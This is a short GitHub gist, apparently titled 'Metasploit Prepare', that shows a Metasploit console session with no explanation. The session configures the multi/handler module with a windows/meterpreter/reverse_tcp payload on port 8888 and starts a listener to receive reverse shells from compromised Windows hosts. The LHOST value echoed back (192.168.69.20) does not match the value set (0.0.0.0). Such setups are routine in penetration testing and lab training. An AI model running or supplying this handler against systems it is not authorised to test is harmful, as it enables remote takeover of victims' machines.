Created
September 29, 2018 12:15
-
-
Save hypery2k/e5a8335b67c2c3af8ca9c1b0ebe11ad3 to your computer and use it in GitHub Desktop.
Metasploit Prepare
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
> msfconsole | |
=[ metasploit v4.16.58-dev ] | |
+ -- --=[ 1769 exploits - 1007 auxiliary - 307 post ] | |
+ -- --=[ 537 payloads - 41 encoders - 10 nops ] | |
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] | |
msf > use multi/handler | |
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp | |
PAYLOAD => windows/meterpreter/reverse_tcp | |
msf exploit(multi/handler) > set LPORT 8888 | |
LPORT => 8888 | |
msf exploit(multi/handler) > set LHOST "0.0.0.0" | |
LHOST => 192.168.69.20 | |
msf exploit(multi/handler) > exploit | |
[*] Started reverse TCP handler on 0.0.0.0:8888 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment